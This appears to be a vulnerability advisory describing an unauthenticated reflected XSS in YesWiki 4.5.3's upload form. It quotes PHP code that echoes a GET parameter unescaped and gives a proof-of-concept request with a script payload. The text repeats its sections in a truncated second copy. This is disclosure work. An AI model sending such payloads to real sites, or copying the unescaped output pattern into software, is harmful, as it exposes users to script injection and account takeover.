Summary
Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication
This Proof of Concept has been performed using the followings:
- YesWiki v4.5.3 (doryphore-dev branch)
- Docker environnment (docker/docker-compose.yml)
Vulnerable code
The vulnerability is located in the file
public function showUploadForm()
{
$this->file = $_GET['file'];
echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n";
echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n"
. ' <input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n"
. ' <input type="hidden" name="MAX_FILE_SIZE" value="' . $this->attachConfig['max_file_size'] . "\" />\n"
. " <input type=\"hidden\" name=\"file\" value=\"$this->file\" />\n"
. " <input type=\"file\" name=\"upFile\" size=\"50\" /><br />\n"
. ' <input class="btn btn-primary" type="submit" value="' . _t('ATTACH_SAVE') . "\" />\n"
. "</form>\n";
}
PoC
- You need to send a request to endpoint and abusing the
file parameter, we can successfully obtain client side javascript execution
GET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: localhost:8085
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
- Get a response
Impact
This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions
References
Summary
Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication
This Proof of Concept has been performed using the followings:
Vulnerable code
The vulnerability is located in the file
PoC
fileparameter, we can successfully obtain client side javascript executionImpact
This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions
References